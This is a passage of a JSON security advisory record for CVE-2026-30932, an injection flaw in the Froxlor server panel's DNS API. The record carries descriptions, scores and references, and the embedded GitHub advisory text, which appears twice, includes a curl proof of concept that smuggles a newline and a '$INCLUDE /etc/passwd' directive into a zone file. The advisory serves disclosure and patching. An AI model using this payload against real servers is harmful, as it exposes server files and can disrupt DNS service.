                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/2.2.0",
                                "product": {
                                    "name": "vers:unknown/2.2.0",
                                    "product_id": "CSAFPID-2486098",
                                    "product_identification_helper": {
                                        "purl": "pkg:composer/froxlor/froxlor@2.2.0"
                                    }
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/2.2.0-rc1",
                                "product": {
                                    "name": "vers:unknown/2.2.0-rc1",
                                    "product_id": "CSAFPID-3765860",
                                    "product_identification_helper": {
                                        "purl": "pkg:composer/froxlor/froxlor@2.2.0-rc1"
                                    }
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/2.2.0-rc2",
                                "product": {
                                    "name": "vers:unknown/2.2.0-rc2",
                                    "product_id": "CSAFPID-4979443",
                                    "product_identification_helper": {
                                        "purl": "pkg:composer/froxlor/froxlor@2.2.0-rc2"
                                    }
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/2.2.0-rc3",
                                "product": {
                                    "name": "vers:unknown/2.2.0-rc3",
                                    "product_id": "CSAFPID-4979444",
                                    "product_identification_helper": {
                                        "purl": "pkg:composer/froxlor/froxlor@2.2.0-rc3"
                                    }
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/2.2.1",
                                "product": {
                                    "name": "vers:unknown/2.2.1",
                                    "product_id": "CSAFPID-2486099",
                                    "product_identification_helper": {
                                        "purl": "pkg:composer/froxlor/froxlor@2.2.1"
                                    }
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/2.2.2",
                                "product": {
                                    "name": "vers:unknown/2.2.2",
                                    "product_id": "CSAFPID-2486100",
                                    "product_identification_helper": {
                                        "purl": "pkg:composer/froxlor/froxlor@2.2.2"
                                    }
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/2.2.3",
                                "product": {
                                    "name": "vers:unknown/2.2.3",
                                    "product_id": "CSAFPID-2486101",
                                    "product_identification_helper": {
                                        "purl": "pkg:composer/froxlor/froxlor@2.2.3"
                                    }
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/2.2.4",
                                "product": {
                                    "name": "vers:unknown/2.2.4",
                                    "product_id": "CSAFPID-2486102",
                                    "product_identification_helper": {
                                        "purl": "pkg:composer/froxlor/froxlor@2.2.4"
                                    }
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/2.2.5",
                                "product": {
                                    "name": "vers:unknown/2.2.5",
                                    "product_id": "CSAFPID-2486103",
                                    "product_identification_helper": {
                                        "cpe": "cpe:2.3:a:froxlor:froxlor:2.2.5:*:*:*:*:*:*:*",
                                        "purl": "pkg:composer/froxlor/froxlor@2.2.5"
                                    }
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/2.2.6",
                                "product": {
                                    "name": "vers:unknown/2.2.6",
                                    "product_id": "CSAFPID-5574732",
                                    "product_identification_helper": {
                                        "purl": "pkg:composer/froxlor/froxlor@2.2.6"
                                    }
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/2.2.7",
                                "product": {
                                    "name": "vers:unknown/2.2.7",
                                    "product_id": "CSAFPID-5574733",
                                    "product_identification_helper": {
                                        "purl": "pkg:composer/froxlor/froxlor@2.2.7"
                                    }
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/2.2.8",
                                "product": {
                                    "name": "vers:unknown/2.2.8",
                                    "product_id": "CSAFPID-5574734",
                                    "product_identification_helper": {
                                        "purl": "pkg:composer/froxlor/froxlor@2.2.8"
                                    }
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/2.3.0",
                                "product": {
                                    "name": "vers:unknown/2.3.0",
                                    "product_id": "CSAFPID-5574735",
                                    "product_identification_helper": {
                                        "purl": "pkg:composer/froxlor/froxlor@2.3.0"
                                    }
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/2.3.0-rc1",
                                "product": {
                                    "name": "vers:unknown/2.3.0-rc1",
                                    "product_id": "CSAFPID-5574736",
                                    "product_identification_helper": {
                                        "purl": "pkg:composer/froxlor/froxlor@2.3.0-rc1"
                                    }
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/2.3.1",
                                "product": {
                                    "name": "vers:unknown/2.3.1",
                                    "product_id": "CSAFPID-5574737",
                                    "product_identification_helper": {
                                        "purl": "pkg:composer/froxlor/froxlor@2.3.1"
                                    }
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/2.3.2",
                                "product": {
                                    "name": "vers:unknown/2.3.2",
                                    "product_id": "CSAFPID-5574738",
                                    "product_identification_helper": {
                                        "purl": "pkg:composer/froxlor/froxlor@2.3.2"
                                    }
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/2.3.3",
                                "product": {
                                    "name": "vers:unknown/2.3.3",
                                    "product_id": "CSAFPID-5574739",
                                    "product_identification_helper": {
                                        "purl": "pkg:composer/froxlor/froxlor@2.3.3"
                                    }
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/2.3.4",
                                "product": {
                                    "name": "vers:unknown/2.3.4",
                                    "product_id": "CSAFPID-5670783",
                                    "product_identification_helper": {
                                        "purl": "pkg:composer/froxlor/froxlor@2.3.4"
                                    }
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/<2.3.5",
                                "product": {
                                    "name": "vers:unknown/<2.3.5",
                                    "product_id": "CSAFPID-5902874",
                                    "product_identification_helper": {
                                        "cpe": "cpe:2.3:a:froxlor:froxlor:*:*:*:*:*:*:*:*"
                                    }
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/>=0|<2.3.5",
                                "product": {
                                    "name": "vers:unknown/>=0|<2.3.5",
                                    "product_id": "CSAFPID-5907925"
                                }
                            }
                        ],
                        "category": "product_name",
                        "name": "Froxlor"
                    }
                ],
                "category": "vendor",
                "name": "Froxlor"
            },
            {
                "branches": [
                    {
                        "branches": [
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/<2.3.5",
                                "product": {
                                    "name": "vers:unknown/<2.3.5",
                                    "product_id": "CSAFPID-5902820"
                                }
                            }
                        ],
                        "category": "product_name",
                        "name": "Froxlor"
                    }
                ],
                "category": "vendor",
                "name": "Open Source"
            }
        ]
    },
    "vulnerabilities": [
        {
            "cve": "CVE-2026-30932",
            "notes": [
                {
                    "category": "description",
                    "text": "Froxlor is open source server administration software. Prior to version 2.3.5, the DomainZones.add API endpoint (accessible to customers with DNS enabled) does not validate the content field for several DNS record types (LOC, RP, SSHFP, TLSA). An attacker can inject newlines and BIND zone file directives (e.g. $INCLUDE) into the zone file that gets written to disk when the DNS rebuild cron job runs. This issue has been patched in version 2.3.5.",
                    "title": "nvd - https://services.nvd.nist.gov/rest/json/cves/2.0?cveId=CVE-2026-30932"
                },
                {
                    "category": "description",
                    "text": "Froxlor is open source server administration software. Prior to version 2.3.5, the DomainZones.add API endpoint (accessible to customers with DNS enabled) does not validate the content field for several DNS record types (LOC, RP, SSHFP, TLSA). An attacker can inject newlines and BIND zone file directives (e.g. $INCLUDE) into the zone file that gets written to disk when the DNS rebuild cron job runs. This issue has been patched in version 2.3.5.",
                    "title": "cveprojectv5 - https://raw.githubusercontent.com/CVEProject/cvelistV5/main/cves/2026/30xxx/CVE-2026-30932.json"
                },
                {
                    "category": "description",
                    "text": "## Summary\n\nThe `DomainZones.add` API endpoint (accessible to customers with DNS enabled) does not validate the `content` field for several DNS record types (LOC, RP, SSHFP, TLSA). An attacker can inject newlines and BIND zone file directives (e.g. `$INCLUDE`) into the zone file that gets written to disk when the DNS rebuild cron job runs.\n\n## Affected Code\n\n`lib/Froxlor/Api/Commands/DomainZones.php`, lines 213-214, 253-254, 290-291, 292-293:\n\n```php\n} elseif ($type == 'LOC' && !empty($content)) {\n    $content = $content; // no validation\n} ...\n} elseif ($type == 'RP' && !empty($content)) {\n    $content = $content; // no validation\n} ...\n} elseif ($type == 'SSHFP' && !empty($content)) {\n    $content = $content; // no validation\n} elseif ($type == 'TLSA' && !empty($content)) {\n    $content = $content; // no validation\n}\n```\n\nThere is even a TODO comment at line 148 acknowledging this gap:\n```php\n// TODO regex validate content for invalid characters\n```\n\nThe content is then written directly into the BIND zone file via `DnsEntry::__toString()` (line 83 of `lib/Froxlor/Dns/DnsEntry.php`):\n\n```php\nreturn $this->record . \"\\t\" . $this->ttl . \"\\t\" . $this->class . \"\\t\" . $this->type . \"\\t\" ... . $_content . PHP_EOL;\n```\n\nAnd the zone file is written to disk in `lib/Froxlor/Cron/Dns/Bind.php` line 121:\n\n```php\nfwrite($zonefile_handler, $zoneContent . $subzones);\n```\n\n## PoC\n\nAs a customer with DNS management enabled and an API key, add a LOC record with injected BIND directives:\n\n```bash\ncurl -s -u \"API_KEY:API_SECRET\" \\\n  -H 'Content-Type: application/json' \\\n  -d '{\"command\":\"DomainZones.add\",\"params\":{\"domainname\":\"example.com\",\"type\":\"LOC\",\"content\":\"0 0 0 N 0 0 0 E 0\\n$INCLUDE /etc/passwd\"}}' \\\n  https://panel.example.com/api.php\n```\n\nAlternatively via the web UI, intercept the DNS editor form POST and set `dns_content` to `0 0 0 N 0 0 0 E 0\\n$INCLUDE /etc/passwd` and `dns_type` to `LOC`.\n\nAfter the DNS rebuild cron runs, the resulting zone file at `{bindconf_directory}/domains/example.com.zone` will contain:\n\n```\n@\t18000\tIN\tLOC\t0 0 0 N 0 0 0 E 0\n$INCLUDE /etc/passwd\n```\n\nBIND will process the `$INCLUDE` directive and attempt to parse `/etc/passwd` as zone data. While most lines will fail to parse as valid records, the file content is readable by the BIND process (running as `bind`/`named` user), confirming file existence and potentially leaking parseable lines as DNS records.\n\n## Impact\n\n1. **Information Disclosure**: The `$INCLUDE` directive lets a customer read world-readable files on the server through the DNS subsystem. The zone content (including included files) is visible to the customer via the `DomainZones.get` API call or the DNS editor in the web UI.\n\n2. **DNS Service Disruption**: Malformed zone content can cause BIND to fail to load the zone, causing DNS outage for the affected domain. Injecting `$GENERATE` directives could create massive record sets for amplification attacks.\n\n3. **Zone Data Manipulation**: Arbitrary DNS records can be injected by breaking out of the current record line with newlines, allowing the customer to create records that were not intended.",
                    "title": "github - https://api.github.com/advisories/GHSA-x6w6-2xwp-3jh6"
                },
                {
                    "category": "description",
                    "text": "## Summary\n\nThe `DomainZones.add` API endpoint (accessible to customers with DNS enabled) does not validate the `content` field for several DNS record types (LOC, RP, SSHFP, TLSA). An attacker can inject newlines and BIND zone file directives (e.g. `$INCLUDE`) into the zone file that gets written to disk when the DNS rebuild cron job runs.\n\n## Affected Code\n\n`lib/Froxlor/Api/Commands/DomainZones.php`, lines 213-214, 253-254, 290-291, 292-293:\n\n```php\n} elseif ($type == 'LOC' && !empty($content)) {\n    $content = $content; // no validation\n} ...\n} elseif ($type == 'RP' && !empty($content)) {\n    $content = $content; // no validation\n} ...\n} elseif ($type == 'SSHFP' && !empty($content)) {\n    $content = $content; // no validation\n} elseif ($type == 'TLSA' && !empty($content)) {\n    $content = $content; // no validation\n}\n```\n\nThere is even a TODO comment at line 148 acknowledging this gap:\n```php\n// TODO regex validate content for invalid characters\n```\n\nThe content is then written directly into the BIND zone file via `DnsEntry::__toString()` (line 83 of `lib/Froxlor/Dns/DnsEntry.php`):\n\n```php\nreturn $this->record . \"\\t\" . $this->ttl . \"\\t\" . $this->class . \"\\t\" . $this->type . \"\\t\" ... . $_content . PHP_EOL;\n```\n\nAnd the zone file is written to disk in `lib/Froxlor/Cron/Dns/Bind.php` line 121:\n\n```php\nfwrite($zonefile_handler, $zoneContent . $subzones);\n```\n\n## PoC\n\nAs a customer with DNS management enabled and an API key, add a LOC record with injected BIND directives:\n\n```bash\ncurl -s -u \"API_KEY:API_SECRET\" \\\n  -H 'Content-Type: application/json' \\\n  -d '{\"command\":\"DomainZones.add\",\"params\":{\"domainname\":\"example.com\",\"type\":\"LOC\",\"content\":\"0 0 0 N 0 0 0 E 0\\n$INCLUDE /etc/passwd\"}}' \\\n  https://panel.example.com/api.php\n```\n\nAlternatively via the web UI, intercept the DNS editor form POST and set `dns_content` to `0 0 0 N 0 0 0 E 0\\n$INCLUDE /etc/passwd` and `dns_type` to `LOC`.\n\nAfter the DNS rebuild cron runs, the resulting zone file at `{bindconf_directory}/domains/example.com.zone` will contain:\n\n```\n@\t18000\tIN\tLOC\t0 0 0 N 0 0 0 E 0\n$INCLUDE /etc/passwd\n```\n\nBIND will process the `$INCLUDE` directive and attempt to parse `/etc/passwd` as zone data. While most lines will fail to parse as valid records, the file content is readable by the BIND process (running as `bind`/`named` user), confirming file existence and potentially leaking parseable lines as DNS records.\n\n## Impact\n\n1. **Information Disclosure**: The `$INCLUDE` directive lets a customer read world-readable files on the server through the DNS subsystem. The zone content (including included files) is visible to the customer via the `DomainZones.get` API call or the DNS editor in the web UI.\n\n2. **DNS Service Disruption**: Malformed zone content can cause BIND to fail to load the zone, causing DNS outage for the affected domain. Injecting `$GENERATE` directives could create massive record sets for amplification attacks.\n\n3. **Zone Data Manipulation**: Arbitrary DNS records can be injected by breaking out of the current record line with newlines, allowing the customer to create records that were not intended.",
                    "title": "osv - https://www.googleapis.com/download/storage/v1/b/osv-vulnerabilities/o/Packagist%2FGHSA-x6w6-2xwp-3jh6.json?alt=media"
                },
                {
                    "category": "other",
                    "text": "0.00044",
                    "title": "EPSS"
                },
                {
                    "category": "other",
                    "text": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X",
                    "title": "CVSSV4"
                },
                {
                    "category": "other",
                    "text": "8.6",
                    "title": "CVSSV4 base score"
                },
                {
                    "category": "other",
                    "text": "4.0",
                    "title": "NCSC Score"
                },
                {
                    "category": "other",
                    "text": "There is product data available from source Certbundde",
                    "title": "NCSC Score top increasing factors"
                },
                {
                    "category": "other",
                    "text": "There is exploit data available from source Nvd, Is related to CWE-74 (Improper Neutralization of Special Elements in Output Used by a Downstream Component ('Injection')), Is related to (a version of) an uncommon product, The CVSS vector string contains A:H (Availability Impact: High)",
                    "title": "NCSC Score top decreasing factors"
                }
            ],
            "product_status": {
                "known_affected": [
                    "CSAFPID-5902820",
                    "CSAFPID-5902874",
                    "CSAFPID-533784",
                    "CSAFPID-533785",
                    "CSAFPID-533786",
                    "CSAFPID-533787",
                    "CSAFPID-533788",
                    "CSAFPID-533789",
                    "CSAFPID-533790",
                    "CSAFPID-533791",
                    "CSAFPID-533792",
                    "CSAFPID-533794",
                    "CSAFPID-533795",
                    "CSAFPID-533796",
                    "CSAFPID-533797",
                    "CSAFPID-533799",
                    "CSAFPID-533800",
                    "CSAFPID-533801",
                    "CSAFPID-584149",
                    "CSAFPID-586038",
                    "CSAFPID-586039",
                    "CSAFPID-586040",
                    "CSAFPID-586041",
                    "CSAFPID-586042",
                    "CSAFPID-586043",
                    "CSAFPID-810703",
                    "CSAFPID-810704",
                    "CSAFPID-810705",
                    "CSAFPID-810706",
                    "CSAFPID-810707",
                    "CSAFPID-810708",
                    "CSAFPID-810709",
                    "CSAFPID-810710",
                    "CSAFPID-810711",
                    "CSAFPID-810712",
                    "CSAFPID-810713",
                    "CSAFPID-810714",
                    "CSAFPID-810715",
                    "CSAFPID-810716",
                    "CSAFPID-810717",
                    "CSAFPID-810718",
                    "CSAFPID-810719",
                    "CSAFPID-810720",
                    "CSAFPID-810721",
                    "CSAFPID-835393",
                    "CSAFPID-835394",
                    "CSAFPID-835395",
                    "CSAFPID-835396",
                    "CSAFPID-876013",
                    "CSAFPID-876014",
                    "CSAFPID-876015",
                    "CSAFPID-876016",
                    "CSAFPID-876017",
                    "CSAFPID-876018",
                    "CSAFPID-876019",
                    "CSAFPID-876020",
                    "CSAFPID-877915",
                    "CSAFPID-877916",
                    "CSAFPID-879533",
                    "CSAFPID-882822",
                    "CSAFPID-882823",
                    "CSAFPID-897815",
                    "CSAFPID-945280",
                    "CSAFPID-945281",
                    "CSAFPID-945282",
                    "CSAFPID-945283",
                    "CSAFPID-945284",
                    "CSAFPID-945285",
                    "CSAFPID-945396",
                    "CSAFPID-945397",
                    "CSAFPID-1015398",
                    "CSAFPID-1015399",
                    "CSAFPID-1095067",
                    "CSAFPID-1095068",
                    "CSAFPID-1095069",
                    "CSAFPID-1095070",
                    "CSAFPID-1095071",
                    "CSAFPID-1095072",
                    "CSAFPID-1095073",
                    "CSAFPID-2486098",
                    "CSAFPID-2486099",
                    "CSAFPID-2486100",
                    "CSAFPID-2486101",
                    "CSAFPID-2486102",
                    "CSAFPID-2486103",
                    "CSAFPID-3452625",
                    "CSAFPID-3452626",
                    "CSAFPID-3765852",
                    "CSAFPID-3765853",
                    "CSAFPID-3765854",
                    "CSAFPID-3765855",
                    "CSAFPID-3765856",
                    "CSAFPID-3765857",
                    "CSAFPID-3765858",
                    "CSAFPID-3765859",
                    "CSAFPID-3765860",
                    "CSAFPID-4979442",
                    "CSAFPID-4979443",
                    "CSAFPID-4979444",
                    "CSAFPID-5574732",
                    "CSAFPID-5574733",
                    "CSAFPID-5574734",
                    "CSAFPID-5574735",
                    "CSAFPID-5574736",
                    "CSAFPID-5574737",
                    "CSAFPID-5574738",
                    "CSAFPID-5574739",
                    "CSAFPID-5670783",
                    "CSAFPID-5907925"
                ]
            },
            "references": [
                {
                    "category": "external",
                    "summary": "Source - nvd",
                    "url": "https://services.nvd.nist.gov/rest/json/cves/2.0?cveId=CVE-2026-30932"
                },
                {
                    "category": "external",
                    "summary": "Source - certbundde",
                    "url": "https://wid.cert-bund.de/.well-known/csaf/white/2026/wid-sec-w-2026-0834.json"
                },
                {
                    "category": "external",
                    "summary": "Source - cveprojectv5",
                    "url": "https://raw.githubusercontent.com/CVEProject/cvelistV5/main/cves/2026/30xxx/CVE-2026-30932.json"
                },
                {
                    "category": "external",
                    "summary": "Source - github",
                    "url": "https://api.github.com/advisories/GHSA-x6w6-2xwp-3jh6"
                },
                {
                    "category": "external",
                    "summary": "Source - osv",
                    "url": "https://www.googleapis.com/download/storage/v1/b/osv-vulnerabilities/o/Packagist%2FGHSA-x6w6-2xwp-3jh6.json?alt=media"
                },
                {
                    "category": "external",
                    "summary": "Source - first",
                    "url": "https://api.first.org/data/v1/epss?limit=10000&offset=0"
                },
                {
                    "category": "external",
                    "summary": "Reference - cveprojectv5; github; nvd; osv",
                    "url": "https://github.com/froxlor/froxlor/commit/b34829262dc32818b37f6a1eabb426d0b277a86b"
                },
                {
                    "category": "external",
                    "summary": "Reference - cveprojectv5; github; nvd; osv",
                    "url": "https://github.com/froxlor/froxlor/releases/tag/2.3.5"
                },
                {
                    "category": "external",
                    "summary": "Reference - certbundde; cveprojectv5; github; nvd; osv",
                    "url": "https://github.com/froxlor/froxlor/security/advisories/GHSA-x6w6-2xwp-3jh6"
                },
                {
                    "category": "external",
                    "summary": "Reference - certbundde",
                    "url": "https://wid.cert-bund.de/.well-known/csaf/white/2026/wid-sec-w-2026-0834.json"
                },
                {
                    "category": "external",
                    "summary": "Reference - certbundde",
                    "url": "https://wid.cert-bund.de/portal/wid/securityadvisory?name=WID-SEC-2026-0834"
                },
                {
                    "category": "external",
                    "summary": "Reference - github",
                    "url": "https://github.com/advisories/GHSA-x6w6-2xwp-3jh6"
                },
                {
                    "category": "external",
                    "summary": "Reference - github",
                    "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-30932"
                }
            ],
            "scores": [
                {
                    "cvss_v3": {
                        "version": "3.1",
                        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
                        "baseScore": 8.8,
                        "baseSeverity": "HIGH"
                    },
                    "products": [
                        "CSAFPID-1015398",
                        "CSAFPID-1015399",
                        "CSAFPID-1095067",
                        "CSAFPID-1095068",
                        "CSAFPID-1095069",
                        "CSAFPID-1095070",
                        "CSAFPID-1095071",
                        "CSAFPID-1095072",
                        "CSAFPID-1095073",
                        "CSAFPID-2486098",
                        "CSAFPID-2486099",
                        "CSAFPID-2486100",
                        "CSAFPID-2486101",
                        "CSAFPID-2486102",
                        "CSAFPID-2486103",
                        "CSAFPID-3452625",
                        "CSAFPID-3452626",
                        "CSAFPID-3765852",
                        "CSAFPID-3765853",
                        "CSAFPID-3765854",
                        "CSAFPID-3765855",
                        "CSAFPID-3765856",
                        "CSAFPID-3765857",
                        "CSAFPID-3765858",
                        "CSAFPID-3765859",
                        "CSAFPID-3765860",
                        "CSAFPID-4979442",
                        "CSAFPID-4979443",
                        "CSAFPID-4979444",
                        "CSAFPID-533784",
                        "CSAFPID-533785",
                        "CSAFPID-533786",
                        "CSAFPID-533787",
                        "CSAFPID-533788",
                        "CSAFPID-533789",
                        "CSAFPID-533790",
                        "CSAFPID-533791",
                        "CSAFPID-533792",
                        "CSAFPID-533794",
                        "CSAFPID-533795",
                        "CSAFPID-533796",
                        "CSAFPID-533797",
                        "CSAFPID-533799",
                        "CSAFPID-533800",
                        "CSAFPID-533801",
                        "CSAFPID-5574732",
                        "CSAFPID-5574733",
                        "CSAFPID-5574734",
                        "CSAFPID-5574735",
                        "CSAFPID-5574736",
                        "CSAFPID-5574737",
                        "CSAFPID-5574738",
                        "CSAFPID-5574739",
                        "CSAFPID-5670783",
                        "CSAFPID-584149",
                        "CSAFPID-586038",
                        "CSAFPID-586039",
                        "CSAFPID-586040",
                        "CSAFPID-586041",
                        "CSAFPID-586042",
                        "CSAFPID-586043",
                        "CSAFPID-5902820",
                        "CSAFPID-5902874",
                        "CSAFPID-5907925",
                        "CSAFPID-810703",
                        "CSAFPID-810704",
                        "CSAFPID-810705",
                        "CSAFPID-810706",
                        "CSAFPID-810707",
                        "CSAFPID-810708",
                        "CSAFPID-810709",
                        "CSAFPID-810710",
                        "CSAFPID-810711",
                        "CSAFPID-810712",
                        "CSAFPID-810713",
                        "CSAFPID-810714",
                        "CSAFPID-810715",
                        "CSAFPID-810716",
                        "CSAFPID-810717",
                        "CSAFPID-810718",
                        "CSAFPID-810719",
                        "CSAFPID-810720",
                        "CSAFPID-810721",
                        "CSAFPID-835393",
                        "CSAFPID-835394",
                        "CSAFPID-835395",
                        "CSAFPID-835396",
                        "CSAFPID-876013",
                        "CSAFPID-876014",
                        "CSAFPID-876015",
                        "CSAFPID-876016",
                        "CSAFPID-876017",
                        "CSAFPID-876018",
                        "CSAFPID-876019",
                        "CSAFPID-876020",
                        "CSAFPID-877915",
                        "CSAFPID-877916",
                        "CSAFPID-879533",
                        "CSAFPID-882822",
                        "CSAFPID-882823",
                        "CSAFPID-897815",
                        "CSAFPID-945280",
                        "CSAFPID-945281",
                        "CSAFPID-945282",
                        "CSAFPID-945283",
                        "CSAFPID-945284",
                        "CSAFPID-945285",
                        "CSAFPID-945396",
                        "CSAFPID-945397"
                    ]
                }
            ],
            "title": "CVE-2026-30932"
        }
    ]
}